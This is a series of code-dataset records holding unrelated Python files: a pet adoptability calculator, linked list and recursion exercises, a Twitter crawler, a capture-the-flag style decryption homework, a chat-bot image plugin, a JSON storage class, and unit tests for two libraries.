1\n elif animal_age >=36 and animal_age < 60:\n points = points + 2\n elif animal_age >= 60 and animal_age < 96:\n points = points + 3\n elif animal_age > 96:\n points = points + 4\n else:\n print(\"Sorry, something went wrong\")\n\n\n \n#Dog\nelif animal_type.lower() == \"dog\":\n bully_breed = screen.textinput(\"How Adoptable?\",\"Is this a bully breed dog? (Yes/No)\")\n#Dog breed\n if bully_breed.lower() == \"yes\":\n points = points + 3\n elif bully_breed.lower() == \"no\":\n toy_breed = screen.textinput(\"How Adoptable?\",\"Is this a toy breed dog?\")\n if toy_breed.lower() == \"yes\":\n points = points - 1\n elif toy_breed.lower() == \"no\":\n pass\n else:\n pass\n else:\n print(\"Sorry, I didn't get that. Please try again\")\n#Dog Colors\n if animal_solid.lower() == \"yes\":\n if animal_color.lower() == \"yes\":\n points = points + 3\n elif animal_color.lower() == \"no\":\n points = points - 1\n else:\n print(\"Sorry, something went wrong. Please try again.\")\n elif animal_solid.lower() == \"no\":\n if animal_color.lower() == \"yes\":\n points = points + 2\n elif animal_color.lower() == \"no\":\n points = points + 1\n else:\n print(\"Sorry, something went wrong. 
Try again.\")\n else: \n print(\"Sorry, I didn't get that\")\n#Dog Age\n if animal_age < 12:\n print(\"Green - this animal will have no problem getting adopted!\")\n elif animal_age >= 12 and animal_age < 36:\n points = points + 1\n elif animal_age >=36 and animal_age < 60:\n points = points + 2\n elif animal_age >= 60 and animal_age < 96:\n points = points + 3\n elif animal_age > 96:\n points = points + 4\n else:\n print(\"Sorry, something went wrong\")\n \n\n#Total Points\ntext_turtle= turtle.Turtle()\ntext_turtle.color(\"white\")\ntext_turtle.hideturtle()\nif animal_type.lower() == \"cat\" or \"dog\":\n if points < 4:\n green_light.color(\"green\")\n text_turtle.write(animal_name + \" will have no \\n problem being adopted!\", font=(\"Arial\",32,\"normal\"))\n elif points >= 4 and points < 6:\n yellow_light.color(\"yellow\")\n text_turtle.write(animal_name + \" may need some \\n help to be adopted\", font=(\"Arial\",32,\"normal\"))\n elif points >= 6:\n red_light.color(\"red\")\n text_turtle.write(animal_name + \" will definitely \\n need help being adopted \\n - consider discounting \\n adoption fee right away!\", font=(\"Arial\",32,\"normal\"))\n else:\n pass\nelse:\n pass\n\n\n\nwn.mainloop()\n","sub_path":"AdoptCalc.py","file_name":"AdoptCalc.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"163657535","text":"from DoublyLinkedList import DoublyLinkedList\ndef copy_linked_list(lnk_lst):\n new = DoublyLinkedList()\n node=lnk_lst.first_node()\n while node != lnk_lst.trailer:\n new.add_last(node.data)\n node=node.next\n return new\n\ndef deep_copy_linked_list(lnk_lst):\n node=lnk_lst.first_node()\n def helper(lnk_lst,node):\n if node==lnk_lst.trailer:\n return DoublyLinkedList()\n else:\n new = helper(lnk_lst,node.next)\n if isinstance(node.data,DoublyLinkedList):\n new.add_first(helper(node.data,node.data.first_node()))\n else:\n new.add_first(node.data)\n return new\n return helper(lnk_lst,node)\ndef main():\n lnk_lst1=DoublyLinkedList()\n elem1=DoublyLinkedList()\n elem1.add_last(1)\n elem1.add_last(2)\n lnk_lst1.add_last(elem1)\n elem2=3\n lnk_lst1.add_last(elem2)\n lnk_lst2=deep_copy_linked_list(lnk_lst1)\n e1=lnk_lst1.first_node()\n e1_1=e1.data.first_node()\n e1_1.data=10\n e2=lnk_lst2.first_node()\n e2_1=e2.data.first_node()\n print(e2_1.data)\n\n","sub_path":"assignment/6/sl6728_hw6_q4.py","file_name":"sl6728_hw6_q4.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"267362104","text":"\r\n# RECURSION FUNCTION PROJECTS\r\ndef sum_to_one(n):\r\n result = 1\r\n call_stack = []\r\n\r\n while n != 1:\r\n execution_context = {\"n_value\": n}\r\n call_stack.append(execution_context)\r\n n -= 1\r\n print(call_stack)\r\n print(\"BASE CASE REACHED\")\r\n\r\n while len(call_stack) != 0:\r\n return_value = call_stack.pop()\r\n print(\"Return value of {0} adding to result {1}\".format(return_value['n_value'], result))\r\n result += return_value['n_value']\r\n return result, call_stack\r\n\r\n\r\n#sum_to_one(4)\r\n\r\n# Task 2\r\n\r\ndef sum_to_one(n):\r\n if n == 1:\r\n return n\r\n print(\"Recursing with input: {0}\".format(n))\r\n return n + sum_to_one(n - 1)\r\n\r\n#print(sum_to_one(7))\r\n\r\n# Task 3\r\n\r\ndef factorial(n):\r\n if n <= 1:\r\n return 1\r\n else:\r\n return n * factorial(n - 1)\r\n\r\n#print(factorial(4))\r\n\r\n# Task 4 Producing subsets in powersets\r\n\r\ndef 
power_set(my_list):\r\n # base case: an empty list\r\n if len(my_list) == 0:\r\n return [[]]\r\n # recursive step: subsets without first element\r\n power_set_without_first = power_set(my_list[1:])\r\n # subsets with first element\r\n with_first = [[my_list[0]] + rest for rest in power_set_without_first]\r\n # return combination of the two\r\n return with_first + power_set_without_first\r\n\r\n\r\nuniversities = ['MIT', 'UCLA', 'Stanford', 'NYU']\r\npower_set_of_universities = power_set(universities)\r\n\r\n#for set in power_set_of_universities:\r\n# print(set)\r\n#print(power_set)\r\n\r\n# Task 5 - removing nested lists from lists , but keeping as a straight list\r\n\r\ndef flatten(my_list):\r\n result = []\r\n for el in my_list:\r\n if isinstance(el, list):\r\n print(\"list found!\")\r\n flat_list = flatten(el)\r\n result += flat_list\r\n else:\r\n result.append(el)\r\n return result\r\n\r\n\r\n### reserve for testing...\r\nplanets = ['mercury', 'venus', ['earth'], 'mars', [['jupiter', 'saturn']], 'uranus', ['neptune', 'pluto']]\r\n#print(flatten(planets))\r\n\r\n# Task 6\r\ndef fibonacci(n):\r\n if n == 1:\r\n return 1\r\n elif n == 0:\r\n return 0\r\n return fibonacci(n - 1) + fibonacci(n - 2)\r\n\r\n\r\n\r\n#print(fibonacci(5))\r\n# set the appropriate runtime:\r\n# 1, logN, N, N^2, 2^N, N!\r\nfibonacci_runtime = \"2^N\"\r\n#print(fibonacci_runtime)\r\n\r\n\r\n# Task 7\r\n\r\ndef factorial(n):\r\n result = 1\r\n while n != 0:\r\n result = result * n\r\n n -= 1\r\n return result\r\n\r\n\r\n# test cases\r\n#print(factorial(3))\r\n#print(factorial(0))\r\n#print(factorial(5))\r\n\r\n# Task 8\r\ndef fibonacci(n):\r\n if n < 0:\r\n ValueError(\"Input 0 or greater only!\")\r\n\r\n fibs = [0, 1]\r\n\r\n if n <= len(fibs) - 1:\r\n return fibs[n]\r\n\r\n while n > len(fibs) - 1:\r\n fibs.append(fibs[-1] + fibs[-2])\r\n\r\n return fibs[-1]\r\n\r\n\r\n# test cases\r\n#print(fibonacci(3) == 2)\r\n#print(fibonacci(7) == 13)\r\n#print(fibonacci(0))\r\n\r\n# Task 9\r\n\r\ndef find_min(my_list, min = None):\r\n if not my_list:\r\n return min\r\n\r\n if not min or my_list[0] < min:\r\n min = my_list[0]\r\n return find_min(my_list[1:], min)\r\n\r\n# test cases\r\n#print(find_min([42, 17, 2, -1, 67]) == -1)\r\n#print(find_min([]) == None)\r\n#print(find_min([13, 72, 19, 5, 86]) == 5)\r\n\r\n# Task 10\r\ndef is_palindrome(str):\r\n if len(str) < 2:\r\n return True\r\n if str[0] != str[-1]:\r\n return False\r\n return is_palindrome(str[1:-1])\r\n\r\n\r\n# test cases\r\n#print(is_palindrome(\"abba\") == True)\r\n#print(is_palindrome(\"abcba\") == False)\r\n\r\n# Task 11\r\ndef multiplication(num_a, num_b):\r\n if num_a == 0 or num_b == 0:\r\n return 0\r\n\r\n return num_a + multiplication(num_a, num_b - 1)\r\n\r\n# test cases\r\n#print(multiplication(3, 7) == 21)\r\n#print(multiplication(5, 5) == 25)\r\n#print(multiplication(0, 4) == 0)\r\n","sub_path":"Recursion.py","file_name":"Recursion.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"242809535","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport time\nfrom contextlib import closing\nfrom logging import getLogger\nimport json\nimport requests\nimport tweepy\nfrom sqlalchemy.orm import load_only\nimport models\nfrom apis import api\nfrom databases import Session\n\n\nlogger = getLogger(__name__)\n\n\ndef int_or_None(s):\n if s is None:\n return None\n else:\n return int(s)\n\n\ndef download_media(rsession, media_urls, 
local_media_file):\n try:\n os.makedirs('media')\n except FileExistsError:\n pass\n filename = os.path.join('media', local_media_file)\n for (i, media_url) in enumerate(media_urls):\n with closing(rsession.get(media_url, stream=True)) as r:\n if r.status_code == 404:\n if i == len(media_urls) - 1:\n logger.warning(\n 'Media not found and giving up fetching: %s',\n media_url)\n continue\n r.raise_for_status()\n with open(filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=128):\n f.write(chunk)\n\n\ndef update_tweet_info(session, tw):\n entities = tw.entities.copy()\n if hasattr(tw, 'extended_entities'):\n for (k, v) in tw.extended_entities.items():\n entities[k] = v\n\n update_user_info(session, tw.user)\n if hasattr(tw, 'quoted_status'):\n quoted_status = tw.quoted_status\n if type(quoted_status) == dict:\n quoted_status = tweepy.Status.parse(api, quoted_status)\n update_tweet_info(session, quoted_status)\n if hasattr(tw, 'retweeted_status'):\n update_tweet_info(session, tw.retweeted_status)\n\n tw_db = session.query(models.Tweet)\\\n .options(load_only(\"id\"))\\\n .filter_by(id=int(tw.id_str))\\\n .one_or_none()\n if tw_db is None:\n tw_db = models.Tweet(id=int(tw.id_str))\n session.add(tw_db)\n if tw.coordinates is not None:\n tw_db.coordinates_longitude = tw.coordinates['coordinates'][0]\n tw_db.coordinates_latitude = tw.coordinates['coordinates'][1]\n else:\n tw_db.coordinates_longitude = None\n tw_db.coordinates_latitude = None\n tw_db.created_at = tw.created_at\n if hasattr(tw, 'current_user_retweet'):\n tw_db.current_user_retweet = \\\n int_or_None(tw.current_user_retweet['id_str'])\n else:\n tw_db.current_user_retweet = None\n tw_db.favorite_count = tw.favorite_count\n tw_db.favorited = tw.favorited\n tw_db.filter_level = getattr(tw, 'filter_level', None)\n tw_db.in_reply_to_screen_name = tw.in_reply_to_screen_name\n tw_db.in_reply_to_status_id = int_or_None(tw.in_reply_to_status_id_str)\n tw_db.in_reply_to_user_id = int_or_None(tw.in_reply_to_user_id_str)\n tw_db.lang = tw.lang\n if hasattr(tw, 'place') and tw.place is not None:\n place = {}\n for k in ['attributes', 'country', 'code', 'country_code',\n 'full_name', 'id', 'name', 'place_type', 'url']:\n if hasattr(tw.place, k):\n place[k] = getattr(tw.place, k)\n place['bounding_box'] = {}\n place['bounding_box']['coordinates'] = \\\n tw.place.bounding_box.coordinates\n place['bounding_box']['type'] = \\\n tw.place.bounding_box.type\n tw_db.place = json.dumps(place)\n else:\n tw_db.place = None\n tw_db.possibly_sensitive = getattr(tw, 'possibly_sensitive', None)\n tw_db.quoted_status_id = \\\n int_or_None(getattr(tw, 'quoted_status_id_str', None))\n if hasattr(tw, 'scopes') and tw.scopes is not None:\n tw_db.scopes = json.dumps(tw.scopes)\n else:\n tw_db.scopes = None\n tw_db.retweet_count = tw.retweet_count\n tw_db.retweeted = tw.retweeted\n if hasattr(tw, 'retweeted_status'):\n tw_db.retweeted_status_id = int_or_None(tw.retweeted_status.id_str)\n else:\n tw_db.retweeted_status_id = None\n tw_db.source = tw.source\n tw_db.source_url = tw.source_url\n tw_db.text = tw.text\n tw_db.truncated = tw.truncated\n tw_db.user_id = int_or_None(tw.user.id_str)\n if hasattr(tw, 'withheld_copyright'):\n tw_db.withheld_copyright = tw.withheld_copyright\n else:\n tw_db.withheld_copyright = None\n if hasattr(tw, 'withheld_in_countries'):\n tw_db.withheld_in_countries = tw.withheld_in_countries\n else:\n tw_db.withheld_in_countries = None\n if hasattr(tw, 'withheld_scope'):\n tw_db.withheld_scope = tw.withheld_scope\n else:\n 
tw_db.withheld_scope = None\n session.commit()\n\n if not hasattr(tw, 'retweeted_status'):\n for m in entities.get('media', []):\n update_media_info(session, tw, m)\n for ht in entities.get('hashtags', []):\n tweet_id = int(tw.id_str)\n indices_begin = ht['indices'][0]\n indices_end = ht['indices'][1]\n ht_db = session.query(models.TweetHashtag)\\\n .options(load_only(\"tweet_id\", \"indices_begin\",\n \"indices_end\"))\\\n .filter_by(tweet_id=tweet_id,\n indices_begin=indices_begin,\n indices_end=indices_end)\\\n .one_or_none()\n if ht_db is None:\n ht_db = models.TweetHashtag(tweet_id=int(tw.id_str),\n indices_begin=indices_begin,\n indices_end=indices_end)\n session.add(ht_db)\n ht_db.text = ht['text']\n session.commit()\n for url in entities.get('urls', []):\n tweet_id = int(tw.id_str)\n indices_begin = url['indices'][0]\n indices_end = url['indices'][1]\n url_db = session.query(models.TweetUrl)\\\n .options(load_only(\"tweet_id\", \"indices_begin\",\n \"indices_end\"))\\\n .filter_by(tweet_id=tweet_id,\n indices_begin=indices_begin,\n indices_end=indices_end)\\\n .one_or_none()\n if url_db is None:\n url_db = models.TweetUrl(tweet_id=int(tw.id_str),\n indices_begin=indices_begin,\n indices_end=indices_end)\n session.add(url_db)\n url_db.url = url['url']\n url_db.display_url = url['display_url']\n url_db.expanded_url = url['expanded_url']\n session.commit()\n for sym in entities.get('symbols', []):\n tweet_id = int(tw.id_str)\n indices_begin = sym['indices'][0]\n indices_end = sym['indices'][1]\n sym_db = session.query(models.TweetSymbol)\\\n .options(load_only(\"tweet_id\", \"indices_begin\",\n \"indices_end\"))\\\n .filter_by(tweet_id=tweet_id,\n indices_begin=indices_begin,\n indices_end=indices_end)\\\n .one_or_none()\n if sym_db is None:\n sym_db = models.TweetSymbol(tweet_id=int(tw.id_str),\n indices_begin=indices_begin,\n indices_end=indices_end)\n session.add(sym_db)\n sym_db.text = sym['text']\n session.commit()\n for um in entities.get('user_mentions', []):\n tweet_id = int(tw.id_str)\n indices_begin = um['indices'][0]\n indices_end = um['indices'][1]\n um_db = session.query(models.TweetUserMention)\\\n .options(load_only(\"tweet_id\", \"indices_begin\",\n \"indices_end\"))\\\n .filter_by(tweet_id=tweet_id,\n indices_begin=indices_begin,\n indices_end=indices_end)\\\n .one_or_none()\n if um_db is None:\n um_db = models.TweetUserMention(tweet_id=int(tw.id_str),\n indices_begin=indices_begin,\n indices_end=indices_end)\n session.add(um_db)\n um_db.user_id = int(um['id_str'])\n um_db.screen_name = um['screen_name']\n um_db.name = um['name']\n session.commit()\n\n\ndef update_user_info(session, u):\n if hasattr(u, 'status') and u.status is not None:\n update_tweet_info(session, u.status)\n\n u_db = session.query(models.User)\\\n .options(load_only(\"id\"))\\\n .filter_by(id=int(u.id_str))\\\n .one_or_none()\n if u_db is None:\n u_db = models.User(id=int(u.id_str))\n session.add(u_db)\n u_db.created_at = u.created_at\n u_db.default_profile = u.default_profile\n u_db.default_profile_image = u.default_profile_image\n u_db.description = u.description\n _entities = getattr(u, 'entities', None)\n u_db.entities = json.dumps(_entities) if _entities is not None else None\n u_db.favourites_count = u.favourites_count\n u_db.follow_request_sent = u.follow_request_sent\n u_db.followers_count = u.followers_count\n u_db.friends_count = u.friends_count\n u_db.geo_enabled = u.geo_enabled\n u_db.is_translator = u.is_translator\n u_db.lang = u.lang\n u_db.listed_count = u.listed_count\n 
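# The long attribute-mirroring runs in this handler could be collapsed
# with a small helper; a sketch assuming plain settable attributes on the
# ORM row. copy_attrs and the two stand-in classes are illustrative
# names, not part of this module.
def copy_attrs(src, dst, names):
    # Mirror each attribute when present on src, else store None -- the
    # same getattr(..., None) guard used throughout update_user_info().
    for name in names:
        setattr(dst, name, getattr(src, name, None))

class Row:  # stand-in for a SQLAlchemy model instance
    pass

class ApiUser:  # stand-in for a tweepy User object
    name, lang = "example", "en"

src, dst = ApiUser(), Row()
copy_attrs(src, dst, ["name", "lang", "time_zone"])
assert dst.name == "example" and dst.time_zone is None  # missing attr -> None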
u_db.location = u.location\n u_db.name = u.name\n u_db.profile_background_color = u.profile_background_color\n u_db.profile_background_image_url = u.profile_background_image_url\n u_db.profile_background_image_url_https = \\\n u.profile_background_image_url_https\n u_db.profile_background_tile = u.profile_background_tile\n u_db.profile_banner_url = getattr(u, 'profile_banner_url', None)\n u_db.profile_image_url = u.profile_image_url\n u_db.profile_image_url_https = u.profile_image_url_https\n u_db.profile_link_color = u.profile_link_color\n u_db.profile_sidebar_border_color = u.profile_sidebar_border_color\n u_db.profile_sidebar_fill_color = u.profile_sidebar_fill_color\n u_db.profile_text_color = u.profile_text_color\n u_db.profile_use_background_image = u.profile_use_background_image\n u_db.protected = u.protected\n u_db.screen_name = u.screen_name\n u_db.show_all_inline_media = getattr(u, 'show_all_inline_media', None)\n if hasattr(u, 'status') and u.status is not None:\n u_db.status_id = int_or_None(u.status.id_str)\n else:\n u_db.status_id = None\n u_db.statuses_count = u.statuses_count\n u_db.time_zone = u.time_zone\n u_db.url = u.url\n u_db.utc_offset = u.utc_offset\n u_db.verified = u.verified\n u_db.withheld_in_countries = getattr(u, 'withheld_in_countries', None)\n u_db.withheld_scope = getattr(u, 'withheld_scope', None)\n session.commit()\n\n\ndef update_media_info(session, tw, m):\n m_db = session.query(models.Media)\\\n .options(load_only(\"id\"))\\\n .filter_by(id=int(m['id_str']))\\\n .one_or_none()\n if m_db is None:\n m_db = models.Media(id=int(m['id_str']))\n session.add(m_db)\n\n m_db.tweet_id = int(tw.id_str)\n m_db.media_url = m['media_url']\n m_db.media_url_https = m['media_url_https']\n m_db.url = m['url']\n m_db.display_url = m['display_url']\n m_db.expanded_url = m['expanded_url']\n m_db.sizes = json.dumps(m['sizes'])\n m_db.type = m['type']\n m_db.indices_begin = m['indices'][0]\n m_db.indices_end = m['indices'][1]\n if 'video_info' in m:\n m_db.video_info = json.dumps(m['video_info'])\n else:\n m_db.video_info = None\n\n m_db.locally_available = False\n m_db.locally_required = False\n session.commit()\n\n\ndef download_all_media(session):\n with requests.Session() as rsession:\n while True:\n media = session.query(models.Media)\\\n .options(load_only('media_url_https', 'video_info'))\\\n .filter_by(locally_required=True)\\\n .filter_by(locally_available=False)\\\n .limit(50)\\\n .all()\n if len(media) == 0:\n break\n for m in media:\n urls = [\n m.media_url_https + ':orig',\n m.media_url_https + ':large',\n m.media_url_https,\n ]\n try:\n download_media(rsession, urls, m.local_media_name)\n m.locally_available = True\n session.commit()\n except Exception as e:\n session.rollback()\n logger.exception(\n \"Exception during fetching media %s\",\n m.media_url_https)\n\n while True:\n media = session.query(models.Media)\\\n .options(load_only())\\\n .filter_by(locally_required=False)\\\n .filter_by(locally_available=True)\\\n .limit(50)\\\n .all()\n if len(media) == 0:\n break\n for m in media:\n try:\n filename = os.path.join('media', m.local_media_name)\n try:\n os.remove(filename)\n except FileNotFoundError as e:\n pass\n m.locally_available = False\n session.commit()\n except Exception as e:\n session.rollback()\n logger.exception(\n \"Exception during deleting media %s\",\n m.local_media_name)\n\n\ndef update_local_requirements():\n session = Session()\n while True:\n media = session.query(models.Media)\\\n .options(load_only())\\\n 
.filter_by(locally_required=None)\\\n .limit(50)\\\n .all()\n if len(media) == 0:\n break\n for m in media:\n m.locally_required = m.locally_available\n session.commit()\n\n\ndef main():\n session = Session()\n count = 200\n while True:\n try:\n tws = api.home_timeline(count=count)\n logger.info(\n \"got %d tweets from home timeline (count=%d)\",\n len(tws), count)\n for tw in tws:\n try:\n update_tweet_info(session, tw)\n except Exception as e:\n session.rollback()\n logger.exception(\n \"Exception during recording tweet %d\",\n tw.id)\n logger.info(\"Recorded tweets to db\")\n download_all_media(session)\n logger.info(\"Downloaded all media\")\n except Exception as e:\n session.rollback()\n logger.exception(\"Exception during fetching home timeline\")\n time.sleep(70)\n\n return 0\n","sub_path":"api_crawler/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"455829050","text":"import random as rand\nfrom typing import List as list\n\n\ndef convert(data, size=4):\n return [int.from_bytes(data[index:index+size], 'big') for index in range(0, len(data), size)]\n\ndef Inverse(data, size=4):\n s = b''.join([d.to_bytes(size, 'big') for d in data])\n return b''.join([d.to_bytes(size, 'big') for d in data])\n\ndef _Decrypt(vector: list[int], key: list[int]):\n sum, delta, mask = 0x59D60180, 0xFACEB00C, 0xffffffff\n for 次數 in range(32):\n vector[1] = vector[1] - ((vector[0] << 4) + key[2] & mask ^ (vector[0] + sum) & mask ^ (vector[0] >> 5) + key[3] & mask) & mask\n vector[0] = vector[0] - ((vector[1] << 4) + key[0] & mask ^ (vector[1] + sum) & mask ^ (vector[1] >> 5) + key[1] & mask) & mask\n sum = sum - delta & mask\n return vector\n\ndef Decrypt(cipher: bytes, key: bytes):\n plain = b''\n for index in range(0, len(cipher), 8):\n plain += Inverse(_Decrypt(convert(cipher[index:index+8]), convert(key)))\n return plain\n\nif __name__ == '__main__':\n code = b'w\\xf9\\x05\\xc3\\x9e6\\xb5\\xeb\\r\\xee\\xcb\\xb4\\xeb\\x08\\xe8\\xcb'\n seed = 1600000000\n while seed > 0:\n rand.seed(seed)\n key = rand.getrandbits(128).to_bytes(16, 'big')\n flag = Decrypt(code, key)\n if flag[:4] == b'FLAG':\n print(flag.decode())\n break\n seed -= 1\n","sub_path":"HW0/4/decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365589418","text":"import gc\nimport re\nfrom typing import Union\n\nfrom botoy import FriendMsg, GroupMsg, S\nfrom botoy import decorators as deco\n\nfrom .model import GetSetuConfig\nfrom .setu import Setu\n\n__doc__ = \"\"\"色图姬\"\"\"\n\nsetuPattern = \"来(.*?)[点丶、个份张幅](.*?)的?([rR]18)?[色瑟涩䔼😍🐍][图圖🤮]\"\ndigitalConversionDict = {\n \"一\": 1,\n \"二\": 2,\n \"两\": 2,\n \"三\": 3,\n \"四\": 4,\n \"五\": 5,\n \"六\": 6,\n \"七\": 7,\n \"八\": 8,\n \"九\": 9,\n \"十\": 10,\n}\n\n\ndef check_and_processing(ctx: Union[GroupMsg, FriendMsg]) -> Union[GetSetuConfig, None]:\n send = S.bind(ctx)\n info = ctx._match\n config = GetSetuConfig()\n if info[1] != \"\":\n if info[1] in digitalConversionDict.keys():\n config.toGetNum = int(digitalConversionDict[info[1]])\n else:\n if info[1].isdigit():\n config.toGetNum = int(info[1])\n else:\n send.text(\"能不能用阿拉伯数字?\")\n # logger.info('非数字')\n return None\n else: # 未指定数量,默认1\n config.toGetNum = 1\n config.tags = [i for i in list(set(re.split(r\"[,, ]\", info[2]))) if i != \"\"]\n if info[3]: # r18关键字\n config.level = 1\n 
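# e.g. a match of ('三', '萝莉,白丝', 'R18') yields toGetNum=3, two tags and level=1\n    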
return config\n\n\n@deco.on_regexp(setuPattern)\n@deco.ignore_botself\n@deco.queued_up\ndef receive_group_msg(ctx: GroupMsg):\n config = check_and_processing(ctx)\n if config is not None:\n setu = Setu(ctx, config)\n setu.main()\n del setu\n gc.collect()\n\n\n@deco.on_regexp(setuPattern)\n@deco.ignore_botself\n@deco.queued_up\ndef receive_friend_msg(ctx: FriendMsg):\n config = check_and_processing(ctx)\n if config is not None:\n setu = Setu(ctx, config)\n setu.main()\n del setu\n gc.collect()\n","sub_path":"plugins/bot_Setu/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"556913837","text":"#!/usr/bin/python3\n\"\"\" This Class define FileStorage Class\"\"\"\n\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\nimport json\n\n\nclass FileStorage:\n \"\"\" Class that serializes instances to a JSON file and\n deserializes JSON file to instances\n Attributes:\n __file_path: path to the JSON file\n __objects: objects will be stored (dictionary persistents)\n \"\"\"\n __file_path = \"file.json\"\n __objects = {}\n\n def all(self):\n \"\"\" Returns the dictionary of persistent objects.\"\"\"\n return FileStorage.__objects\n\n def new(self, obj):\n \"\"\" Sets in __objects the obj with key .id \"\"\"\n key = '{}.{}'.format(type(obj).__name__, obj.id)\n FileStorage.__objects.update({key: obj})\n\n def save(self):\n \"\"\" Serialize __objects to the JSON file \"\"\"\n\n JSON_dict_dump = {}\n for key in FileStorage.__objects.keys():\n JSON_dict_dump[key] = FileStorage.__objects[key].to_dict()\n\n with open(FileStorage.__file_path, mode='w', encoding='UTF-8') as f:\n json.dump(JSON_dict_dump, f)\n\n def reload(self):\n \"\"\" Serializes __objects to the JSON file (path: __file_path) \"\"\"\n\n nc = {\"BaseModel\": BaseModel,\n \"User\": User,\n \"Place\": Place,\n \"State\": State,\n \"City\": City,\n \"Amenity\": Amenity,\n \"Review\": Review}\n\n try:\n with open(FileStorage.__file_path, 'r', encoding=\"UTF-8\") as f:\n json_d_load = json.load(f)\n\n for key in json_d_load:\n\n class_obj = json_d_load[key][\"__class__\"]\n\n FileStorage.__objects[key] = nc[class_obj](**json_d_load[key])\n\n except Exception:\n pass\n","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"2950682","text":"# License: Simplified BSD, 2014\n# See LICENSE.txt for more information\nfrom __future__ import absolute_import, print_function, division, unicode_literals\n\nimport numpy as np\nfrom numpy.testing import assert_allclose\nimport itertools\nfrom scidbpy.utils import broadcastable\nfrom scidbpy._py3k_compat import genfromstr\n\n\ndef test_gen_from_string():\n s = '\\n'.join(map(str, range(10)))\n a = genfromstr(s, dtype=float)\n assert_allclose(a, np.arange(10))\n\n\ndef test_broadcastable():\n for ndim1 in range(1, 4):\n for ndim2 in range(1, 4):\n for shape1 in itertools.permutations(range(1, 4), ndim1):\n for shape2 in itertools.permutations(range(1, 4), ndim2):\n try:\n np.broadcast(np.zeros(shape1),\n np.zeros(shape2))\n result = True\n except ValueError:\n result = False\n assert result == broadcastable(shape1, 
shape2)\n","sub_path":"scidbpy/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"123538190","text":"import transaction\nfrom io import BytesIO\nfrom pyramid.compat import bytes_, binary_type, text_type\nimport ptah\nfrom ptah.testing import PtahTestCase\n\n\nclass TestBlob(PtahTestCase):\n\n _includes = ('ptahcms',)\n\n def test_blob(self):\n import ptahcms\n\n blob = ptahcms.blob_storage.add(BytesIO(bytes_('blob data','utf-8')))\n self.assertTrue(ptahcms.IBlob.providedBy(blob))\n self.assertEqual(blob.read(), bytes_('blob data','utf-8'))\n self.assertTrue(ptahcms.IBlobStorage.providedBy(ptahcms.blob_storage))\n\n def test_blob_create(self):\n import ptahcms\n\n blob = ptahcms.blob_storage.create()\n self.assertTrue(ptahcms.IBlob.providedBy(blob))\n self.assertEqual(blob.read(), None)\n\n def test_blob_metadata(self):\n import ptahcms\n\n blob = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')),\n filename='test.txt', mimetype='text/plain')\n\n self.assertEqual(blob.filename, 'test.txt')\n self.assertEqual(blob.mimetype, 'text/plain')\n\n def test_blob_info(self):\n import ptahcms\n blob = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')),\n filename='test.txt', mimetype='text/plain')\n\n info = blob.info()\n self.assertEqual(info['__uri__'], blob.__uri__)\n self.assertEqual(info['filename'], 'test.txt')\n self.assertEqual(info['mimetype'], 'text/plain')\n\n def test_blob_resolver(self):\n import ptahcms\n\n blob = ptahcms.blob_storage.add(BytesIO(bytes_('blob data','utf-8')))\n\n blob_uri = blob.__uri__\n transaction.commit()\n\n blob = ptah.resolve(blob_uri)\n\n self.assertEqual(blob.__uri__, blob_uri)\n self.assertEqual(blob.read(), bytes_('blob data','utf-8'))\n\n def test_blob_with_parent(self):\n import ptahcms\n\n class MyContent(ptahcms.Node):\n __name__ = ''\n __mapper_args__ = {'polymorphic_identity': 'mycontent'}\n __uri_factory__ = ptah.UriFactory('test')\n\n content = MyContent()\n content_uri = content.__uri__\n ptah.get_session().add(content)\n\n blob_uri = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')), content).__uri__\n transaction.commit()\n\n blob = ptah.resolve(blob_uri)\n self.assertEqual(blob.__parent_ref__.__uri__, content_uri)\n\n blob = ptahcms.blob_storage.getByParent(content_uri)\n self.assertEqual(blob.__uri__, blob_uri)\n\n def test_blob_write(self):\n import ptahcms\n\n blob_uri = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8'))).__uri__\n blob = ptah.resolve(blob_uri)\n blob.write(bytes_('new data','utf-8'))\n transaction.commit()\n\n blob = ptah.resolve(blob_uri)\n self.assertEqual(blob.read(), bytes_('new data','utf-8'))\n\n def test_blob_rest_data(self):\n import ptahcms\n from ptahcms.rest import blobData\n\n blob = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')),\n filename='test.txt', mimetype='text/plain')\n\n response = blobData(blob, self.request)\n self.assertEqual(response.body, bytes_('blob data','utf-8'))\n self.assertEqual(\n response.headerlist,\n [('Content-Type', bytes_('text/plain')),\n ('Content-Disposition', bytes_('filename=\"test.txt\"','utf-8')),\n ('Content-Length', '9')])\n\n def test_blob_rest_data_headers_unicode(self):\n import ptahcms\n from ptahcms.rest import blobData\n\n blob = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')),\n filename='test.jpg', 